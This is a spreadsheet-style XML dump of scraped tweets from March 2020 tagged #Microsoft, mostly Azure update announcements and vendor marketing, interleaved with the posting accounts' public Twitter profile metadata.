    <t>{'id': 418914244, 'id_str': '418914244', 'name': 'Protech Associates', 'screen_name': 'protechcloud', 'location': 'Columbia, Maryland', 'description': 'Protech combines world-class Microsoft business applications and member-focused features to create the most powerful association management platform.', 'url': 'http://t.co/GC7S3NANVd', 'entities': {'url': {'urls': [{'url': 'http://t.co/GC7S3NANVd', 'expanded_url': 'http://www.protechassociates.com', 'display_url': 'protechassociates.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 413, 'friends_count': 465, 'listed_count': 25, 'created_at': 'Tue Nov 22 18:35:32 +0000 2011', 'favourites_count': 446, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1747,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'http://pbs.twimg.com/profile_images/1121070749933023233/RmpoDBAn_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121070749933023233/RmpoDBAn_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/418914244/1560359155', 'profile_link_color': '5EA80C',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</si>
  <si>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17:48:31 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Automatic instance repairs for Azure virtual machine scale sets now in preview
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/Bq9EwBvY5U</t>
  </si>
  <si>
    <t>{'id': 594487574, 'id_str': '594487574', 'name': 'Riccardo Corna', 'screen_name': 'riccardocorna', 'location': 'Milano, Lombardia', 'description': 'Una volta si diceva "sistemista #Microsoft"\nParlo di Azure, Office365 e Windows su https://t.co/4J9zYORgTe, ascolto musica insolita, sempre alla ricerca di un piano B', 'url': 'https://t.co/82oGvbndSl', 'entities': {'url': {'urls': [{'url': 'https://t.co/82oGvbndSl', 'expanded_url': 'http://itspecialist.pro', 'display_url': 'itspecialist.pro', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/4J9zYORgTe', 'expanded_url': 'http://ITSpecialist.pro', 'display_url': 'ITSpecialist.pro', 'indices': [83, 106]}]}}, 'protected': False, 'followers_count': 838, 'friends_count': 240, 'listed_count': 40, 'created_at': 'Wed May 30 10:25:00 +0000 2012', 'favourites_count': 1172, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5095,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'http://pbs.twimg.com/profile_images/809421358732079104/T7v_ND2H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/809421358732079104/T7v_ND2H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/594487574/1556092932', 'profile_link_color': '1B95E0',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</si>
  <si>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 xml:space="preserve"> #Azure Updates: Azure Site Recovery mobility service automated deployment using JetPatch
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/ocJ0SNFx0D</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure SQL Database managed instance now enforces TLS 1.2 on outbound connections
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/THIL8bEyyZ</t>
  </si>
  <si>
    <t>Thu Mar 05 17:48:30 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Upgrade the TLS version of your Power BI application to TLS 1.2
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/OfsVHkw3LA</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure IoT Python SDK v2New improvements are now available 
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/kg3nPwPGMG</t>
  </si>
  <si>
    <t>Thu Mar 05 17:45:41 +0000 2020</t>
  </si>
  <si>
    <t>Polymer 3.0 moves to NPM and ES6 Modules with templates in JavaScript
#100DaysOfCode #JavaScript #Programming #VueJS #NodeJS #Angular #Android #iOS #web #301DaysOfCode #Linux #Microsoft #Mobile #npm #DOM #Malware
https://t.co/HWqJfEkxnW</t>
  </si>
  <si>
    <t>{'id': 1211014246072344576, 'id_str': '1211014246072344576', 'name': 'ImPisces ð ®· ðŸ•‰ï¸', 'screen_name': 'SoyLuisCorona_', 'location': 'CuauhtÃ©moc, Distrito Federal', 'description': 'I am a JavaScript DeveloperðŸ’¾, I like GraffitiðŸ—½ and Electronic musicðŸ’¿.\n\nMy InstagramðŸ“· Profile https://t.co/CaOJyHj6lN', 'url': 'https://t.co/C0J429Zpcl', 'entities': {'url': {'urls': [{'url': 'https://t.co/C0J429Zpcl', 'expanded_url': 'https://codepad.co/coronaenriquemorales', 'display_url': 'codepad.co/coronaenriquemâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/CaOJyHj6lN', 'expanded_url': 'http://instagram.com/soyluiscorona247', 'display_url': 'instagram.com/soyluiscorona2â€¦', 'indices': [93, 116]}]}}, 'protected': False, 'followers_count': 417, 'friends_count': 470, 'listed_count': 3, 'created_at': 'Sat Dec 28 20:01:22 +0000 2019', 'favourites_count': 2400, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 931, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1211014675850244097/PhGqGv9J_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211014675850244097/PhGqGv9J_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1211014246072344576/1577667032',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</si>
  <si>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17:45:26 +0000 2020</t>
  </si>
  <si>
    <t>Get some great Xbox 360 gamage at Entertainment Castle today!
Don't forget that Entertainment Castle pays CASH for items just like these! Shop on Facebook or eBay!
#videogames #Xbox360 #Microsoft #entertainmentcastle https://t.co/74yuH1uQDK</t>
  </si>
  <si>
    <t>{'id': 1168680465441665024, 'id_str': '1168680465441665024', 'name': 'EntertainmentCastle', 'screen_name': 'EntertainCastle', 'location': 'Pikeville, KY', 'description': 'I specialize in helping collectors and gift-givers alike find just the right item!', 'url': 'https://t.co/d2MpTIVlea', 'entities': {'url': {'urls': [{'url': 'https://t.co/d2MpTIVlea', 'expanded_url': 'http://www.ebay.com/str/EntertainmentCastle', 'display_url': 'ebay.com/str/Entertainmâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 19, 'listed_count': 0, 'created_at': 'Tue Sep 03 00:22:38 +0000 2019', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 185, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1168683049657294848/ZXJ4IWhP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168683049657294848/ZXJ4IWhP_normal.jpg',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</si>
  <si>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17:45:23 +0000 2020</t>
  </si>
  <si>
    <t>Azure SQL Database managed instance now enforces TLS 1.2 on outbound connections  https://t.co/3utjMqXSFg  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Azure Site Recovery mobility service automated deployment using JetPatch  https://t.co/F1BHcMd3mr  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Automatic instance repairs for Azure virtual machine scale sets now in preview  https://t.co/Afr5trVIKr  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Azure IoT Python SDK v2New improvements are now available   https://t.co/AY2brfC8B9  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Thu Mar 05 17:43:24 +0000 2020</t>
  </si>
  <si>
    <t>#YesBank 's journey from #Microsoft to #SBI is like a bachelor's journey from #tinder to #Jeevansaathi, ultimately arranged by parents.
#career #economy #Banks</t>
  </si>
  <si>
    <t>{'id': 59141305, 'id_str': '59141305', 'name': 'Nishit Salian', 'screen_name': 'nissh18', 'location': 'Mumbai', 'description': 'Film Maker &amp; Content Head - FlyingSoul Films || Political Enthusiasts', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 64, 'listed_count': 0, 'created_at': 'Wed Jul 22 14:36:24 +0000 2009', 'favourites_count': 2089, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1656, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'CECAA7', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1097367845426597890/-A8xPL8l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1097367845426597890/-A8xPL8l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/59141305/1385541547', 'profile_link_color': 'D1B0A9', 'profile_sidebar_border_color': '3B3242', 'profile_sidebar_fill_color': 'FF42A2', 'profile_text_color': 'DE90A2', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 17:42:26 +0000 2020</t>
  </si>
  <si>
    <t>Upgrade the TLS version of your Power BI application to TLS 1.2  https://t.co/2qqfVutOyI   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Azure Site Recovery mobility service automated deployment using JetPatch  https://t.co/F1BHcMuEL1   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Automatic instance repairs for Azure virtual machine scale sets now in preview  https://t.co/Afr5trVIKr   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Azure IoT Python SDK v2New improvements are now available   https://t.co/AY2brfkxJB   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Azure SQL Database managed instance now enforces TLS 1.2 on outbound connections  https://t.co/3utjMqXSFg   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Thu Mar 05 17:42:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's solution for #COVID-19 is a free #Teams subscription for six months https://t.co/OMujplzFdY</t>
  </si>
  <si>
    <t>Thu Mar 05 17:41:19 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Automatic instance repairs for Azure virtual machine scale sets now in preview https://t.co/49rRpqC1ul</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure IoT Python SDK v2New improvements are now available  https://t.co/D2bB7dd3PN</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure Site Recovery mobility service automated deployment using JetPatch https://t.co/fqhak22TpJ</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure SQL Database managed instance now enforces TLS 1.2 on outbound connections https://t.co/tiTle69VOT</t>
  </si>
  <si>
    <t>Thu Mar 05 17:39:08 +0000 2020</t>
  </si>
  <si>
    <t>Azure Site Recovery mobility service automated deployment using JetPatch https://t.co/vRAlVsVnMi  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>We've partnered with @EazyStock to bring inventory optimization to Microsoft Dynamics 365 Business Central! 
https://t.co/agYy5RxRL9
#Microsoft #Inventory #optimization #MSDyn365bc #MSDyn365" https://t.co/vL3F6qyJB5</t>
  </si>
  <si>
    <t>{'id': 299312396, 'id_str': '299312396', 'name': 'Solution Systems', 'screen_name': 'Solution_System', 'location': 'Rolling Meadows, Illinois', 'description': "Microsoft Gold Certified &amp; President's Club Award winner dabbling in Microsoft Dynamics 365. #MSDynNAV, #MSDyn365BC, #PowerBI, #O365, #CRM, #Azure, #ERP", 'url': 'https://t.co/cZ693VAMpS', 'entities': {'url': {'urls': [{'url': 'https://t.co/cZ693VAMpS', 'expanded_url': 'https://www.solsyst.com', 'display_url': 'solsyst.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1179, 'friends_count': 2076, 'listed_count': 161, 'created_at': 'Sun May 15 21:28:07 +0000 2011', 'favourites_count': 633, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9280, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '003075', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/793166949832335360/BaWV7od6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/793166949832335360/BaWV7od6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/299312396/1528467173', 'profile_link_color': '00B7C3',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</si>
  <si>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Azure SQL Database managed instance now enforces TLS 1.2 on outbound connections https://t.co/jzJDEoB3hT  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Thu Mar 05 17:39:07 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Python SDK v2New improvements are now available  https://t.co/Hn4qjMA4kV  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Automatic instance repairs for Azure virtual machine scale sets now in preview https://t.co/x44OcbjsOO  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Thu Mar 05 17:35:05 +0000 2020</t>
  </si>
  <si>
    <t>Join us at VOX ISMs FPAC event today from 1:30 PM  3:30 PM at Microsoft Canada HQ in Mississauga! You wont want to miss out on our presentation -  Leveraging IIoT For Productivity Gain &amp;amp; Quick ROI: https://t.co/a984DvSA3Z 
#Manufacturing #IIoT #Toronto #Microsoft</t>
  </si>
  <si>
    <t>{'id': 863175311298580480, 'id_str': '863175311298580480', 'name': 'FreePoint', 'screen_name': 'getfreepoint', 'location': 'London, Ontario', 'description': 'Measure. Analyze. Share.  Machine monitoring solutions designed to engage your workers and help you make more informed decisions.', 'url': 'https://t.co/7YZlAMttxC', 'entities': {'url': {'urls': [{'url': 'https://t.co/7YZlAMttxC', 'expanded_url': 'http://www.getfreepoint.com', 'display_url': 'getfreepoint.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 367, 'friends_count': 1108, 'listed_count': 9, 'created_at': 'Fri May 12 23:33:26 +0000 2017', 'favourites_count': 2690, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 976, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/878226043974201344/1aKLHuCc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/878226043974201344/1aKLHuCc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/863175311298580480/1574865271',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</si>
  <si>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17:34:25 +0000 2020</t>
  </si>
  <si>
    <t>Automatic instance repairs for Azure virtual machine scale sets now in preview: https://t.co/v9j0MkYzxV #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 17:33:20 +0000 2020</t>
  </si>
  <si>
    <t>#Future is now! futureproofn #microsoft Follow us for latest Info Coronavirus panic is expediting the demise of tech conventions https://t.co/O2ohZZW3QX</t>
  </si>
  <si>
    <t>Thu Mar 05 17:33:04 +0000 2020</t>
  </si>
  <si>
    <t>OneDrive.exe installation per machine available: Read https://t.co/O6pR4hZic3 #OneDrive #NGSC #NextGenerationSyncClient #ODFB #Microsoft https://t.co/DIJZPLVGdu</t>
  </si>
  <si>
    <t>{'id': 18921160, 'id_str': '18921160', 'name': 'Mr.OneDrive | MVP #Speaker, working on a BOT', 'screen_name': 'HansBrender', 'location': 'Aalen, Germany', 'description': '#MVP Office Apps and Services,  OneDrive for Business, #OneDrive, Next Generation Sync Client, #NGSC, #ODFB #OD4B, #Office #Collaboration', 'url': 'http://t.co/KkT04gk78V', 'entities': {'url': {'urls': [{'url': 'http://t.co/KkT04gk78V', 'expanded_url': 'http://about.me/hans.brender', 'display_url': 'about.me/hans.brender', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3663, 'friends_count': 1509, 'listed_count': 252, 'created_at': 'Tue Jan 13 00:01:34 +0000 2009', 'favourites_count': 4056, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 49642,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'http://pbs.twimg.com/profile_images/1083051899983675393/bJX1dgFQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1083051899983675393/bJX1dgFQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18921160/1398255885', 'profile_link_color': '2F82ED',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</si>
  <si>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Thu Mar 05 17:32:16 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "PwndLocker Ransomware Gets Pwned: Decryption Now Available:" https://t.co/NBjehzIuy7
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Mar 05 17:32:05 +0000 2020</t>
  </si>
  <si>
    <t>We are pleased to announce that this week C5 Alliance achieved the Microsoft Silver Security Competency! Find out more about cyber security services here: https://t.co/BfK3MYGSKp #cybersecurity #microsoft https://t.co/48Gm6vq4Cx</t>
  </si>
  <si>
    <t>{'id': 111094985, 'id_str': '111094985', 'name': 'C5 Alliance', 'screen_name': 'C5Alliance', 'location': 'Jsy &amp; Gsy â€¢ Channel Islands UK', 'description': 'Changing the way the Channel Islands use technology for positive impact', 'url': 'http://t.co/xGEmjYRyHE', 'entities': {'url': {'urls': [{'url': 'http://t.co/xGEmjYRyHE', 'expanded_url': 'http://www.c5alliance.com', 'display_url': 'c5alliance.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1716, 'friends_count': 966, 'listed_count': 161, 'created_at': 'Wed Feb 03 20:07:02 +0000 2010', 'favourites_count': 1260, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3306, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3A90CE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1054340002623250435/2pBCK6kW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1054340002623250435/2pBCK6kW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/111094985/1574096254', 'profile_link_color': '3A90CE', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '003468', 'profile_text_color': 'FFFFFF', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 17:32:01 +0000 2020</t>
  </si>
  <si>
    <t>Understanding the Concept of #Confidential #Computing - A new milestone in #Cyber and #Data #Security #CyberSecurity #DataSecurity #encryption #Cloud #google #IBM #Microsoft
https://t.co/vAEYuipIrq
@antgrasso @Fisher85M @sbmeunier @Archimedius @stu @marcusborba https://t.co/GJRIiAdKpG</t>
  </si>
  <si>
    <t>{'id': 981838101025730560, 'id_str': '981838101025730560', 'name': 'HiTechNectar', 'screen_name': 'HitechNectar', 'location': '', 'description': 'We bring you the most fascinating #tech stories &amp; blogs. #ArtificialIntelligence #CloudComputing #Robotics #Blockchain #MachineLearning #DataAnalysis #IoT', 'url': 'https://t.co/vZhGSHtmNs', 'entities': {'url': {'urls': [{'url': 'https://t.co/vZhGSHtmNs', 'expanded_url': 'https://www.hitechnectar.com/blogs/', 'display_url': 'hitechnectar.com/blogs/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 552, 'friends_count': 290, 'listed_count': 8, 'created_at': 'Thu Apr 05 10:16:59 +0000 2018', 'favourites_count': 86, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1364,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'http://pbs.twimg.com/profile_images/1002195935965757441/zgHbtlcI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1002195935965757441/zgHbtlcI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/981838101025730560/1557149932', 'profile_link_color': '1EFFF3',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</si>
  <si>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17:31:43 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Study a true merger idea between HBO, Warner Bros, Paramount, MGM, the full open source from Apple systems, true cooperation with YouTube, whether for free or for a minimal fee to support talent, and open source Hollywood to all parts of the world for all talents</t>
  </si>
  <si>
    <t>{'id': 1222220531027652609, 'id_str': '1222220531027652609', 'name': 'DolshtaWaleed', 'screen_name': 'waleeda79340627', 'location': 'usa', 'description': 'Ù†Ø¹Ù… Ø¨ÙƒÙ„ ÙØ®Ø± Ø§Ù…Ù„Ùƒ Ø§Ø³ØªÙˆÙ† Ù…Ø§Ø±ØªÙ† Ø¯ÙŠ Ø¨ÙŠ 11 ÙˆØ´Ø§Ù„ÙŠÙ‡ Ø±Ø§Ù‚ÙŠ Ø¬Ø¯Ø§ Ù„Ù„ØºØ§ÙŠØ© ÙÙŠ Ø§ÙŠØ¨ÙŠØ²Ø§ Ø´ÙƒØ±Ø§ Ø¹Ø§Ù„Ù… Ø§Ù„ØªÙ‚Ù†ÙŠØ© Ø´ÙƒØ±Ø§ Ø§Ù„Ù…Ø¯ÙˆÙ† Ù…Ø­Ù…Ø¯ Ø­Ø¨Ø´ owner of aston martin new DB 11 and villa in ibiza', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 65, 'friends_count': 1755, 'listed_count': 0, 'created_at': 'Tue Jan 28 18:11:22 +0000 2020', 'favourites_count': 1911, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3409, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222299825347141633/tsy5c1K5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222299825347141633/tsy5c1K5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1222220531027652609/1581633587',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</si>
  <si>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17:30:32 +0000 2020</t>
  </si>
  <si>
    <t>In 1995 Bill Gates sent the "Internet Tidal Wave" memorandum to #Microsoft executives. The memo described Netscape with their Netscape Navigator as a "new competitor born on the Internet." Gates assigned the Internet as the highest level of importance and eventually launched MSN. https://t.co/rdcTWdz1xv</t>
  </si>
  <si>
    <t>{'id': 841358551499042818, 'id_str': '841358551499042818', 'name': 'Dynamic Consultants', 'screen_name': 'DynamicCG', 'location': 'Kansas City, MO', 'description': 'Leading Microsoft Partner to Partner consulting firm specializing in Microsoft Partner Channel Consulting White and Grey Label Consulting for Dynamics 365/', 'url': 'https://t.co/MFtmc30Wzq', 'entities': {'url': {'urls': [{'url': 'https://t.co/MFtmc30Wzq', 'expanded_url': 'https://www.dynamicconsultantsgroup.com/', 'display_url': 'dynamicconsultantsgroup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1562, 'friends_count': 2957, 'listed_count': 13, 'created_at': 'Mon Mar 13 18:41:25 +0000 2017', 'favourites_count': 1239, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1447,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'http://pbs.twimg.com/profile_images/1022568368094601216/OCVWWNAR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1022568368094601216/OCVWWNAR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/841358551499042818/1582576532', 'profile_link_color': '50BD97',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</si>
  <si>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17:30:02 +0000 2020</t>
  </si>
  <si>
    <t>#Linux and #OpenSource are in #business by #Microsoft https://t.co/4ltCkymUEQ #ElectroOptics</t>
  </si>
  <si>
    <t>{'id': 2676695558, 'id_str': '2676695558', 'name': 'Debesh Choudhury', 'screen_name': 'debeshchoudhury', 'location': 'Kolkata, West Bengal', 'description': 'Digitalist, Researcher, Engineer, Writer -- Privacy Protected Identity, Password &amp; Cybersecurity, Self-Sovereign Biometrics, Distributed Ledgers, IoT', 'url': 'https://t.co/6eZxrSTr43', 'entities': {'url': {'urls': [{'url': 'https://t.co/6eZxrSTr43', 'expanded_url': 'http://infosensys.com', 'display_url': 'infosensys.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 790, 'friends_count': 1838, 'listed_count': 33, 'created_at': 'Thu Jul 24 12:31:39 +0000 2014', 'favourites_count': 846, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 33073,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'http://pbs.twimg.com/profile_images/944844552820555776/n1RiLr_Z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/944844552820555776/n1RiLr_Z_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2676695558/1536970263',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</si>
  <si>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17:29:09 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.  
#EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/RNmaPd4suP</t>
  </si>
  <si>
    <t>{'id': 728551287399305216, 'id_str': '728551287399305216', 'name': 'Synergo Group', 'screen_name': 'SynergoGroup', 'location': 'Toronto, Ontario', 'description': '#Mobile &amp; #Web #App #Development #Toronto Helping #Startups, #Agency &amp; #Enterprise turn great #App #Ideas into reality #AI #MachineLearning #IoT', 'url': 'https://t.co/Iy8J5Q8huD', 'entities': {'url': {'urls': [{'url': 'https://t.co/Iy8J5Q8huD', 'expanded_url': 'http://bit.ly/2mwrsVj', 'display_url': 'bit.ly/2mwrsVj', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1306, 'friends_count': 1079, 'listed_count': 37, 'created_at': 'Fri May 06 11:45:37 +0000 2016', 'favourites_count': 9394, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20796,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'http://pbs.twimg.com/profile_images/728558100760940545/1e0kdPC7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/728558100760940545/1e0kdPC7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/728551287399305216/1489678230',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</si>
  <si>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17:25:02 +0000 2020</t>
  </si>
  <si>
    <t>Our recap video is now live! @msft4startups partners with @Invest_Ottawa to drive public sector innovation and accelerate B2B, Seed/SeriesA+ startups #Microsoft is the #1 enterprise cloud for #startups #cdntech
https://t.co/5WzJol3TiT</t>
  </si>
  <si>
    <t>{'id': 44816786, 'id_str': '44816786', 'name': 'Adam Nanjee', 'screen_name': 'adamnanjee', 'location': 'Toronto | Canada', 'description': 'Managing Director, Canada @Microsoft for #Startups, Board @CIXCommunity previous #startup @Zafin ran #startups @MaRSDD @MasterCard @BlackBerry DM @msft4startups', 'url': 'https://t.co/MHsE3C1FpF', 'entities': {'url': {'urls': [{'url': 'https://t.co/MHsE3C1FpF', 'expanded_url': 'https://startups.microsoft.com', 'display_url': 'startups.microsoft.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3635, 'friends_count': 443, 'listed_count': 565, 'created_at': 'Fri Jun 05 04:04:51 +0000 2009', 'favourites_count': 5326, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12775,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'http://pbs.twimg.com/profile_images/1082721159685255174/hENpeFSC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082721159685255174/hENpeFSC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/44816786/1531142319',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</si>
  <si>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17:22:34 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Training happening now at #Microsoft FLL @emereb is in town!  
Lets get the #AZ900 cert! 
#MicrosoftAzure https://t.co/xAuXDIr7yE</t>
  </si>
  <si>
    <t>{'id': 837559364630138881, 'id_str': '837559364630138881', 'name': 'Cecilia Brusatori', 'screen_name': 'CeBrusa', 'location': 'Miami, FL', 'description': 'Love playing with #DataðŸ˜Š #BI #DataAnalytics #PowerBI * Founder of @magnadatainc * Love Dogs ðŸ¶ * PASS #SQLServer UG Chapter Leader @sfssug @MsDataAI', 'url': 'https://t.co/eYRTaVC8Ay', 'entities': {'url': {'urls': [{'url': 'https://t.co/eYRTaVC8Ay', 'expanded_url': 'http://cebrusa.com', 'display_url': 'cebrusa.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 571, 'friends_count': 233, 'listed_count': 10, 'created_at': 'Fri Mar 03 07:04:48 +0000 2017', 'favourites_count': 1863, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1098,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'http://pbs.twimg.com/profile_images/1135009237602623488/qJKJj0kV_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1135009237602623488/qJKJj0kV_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/837559364630138881/1488526626',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</si>
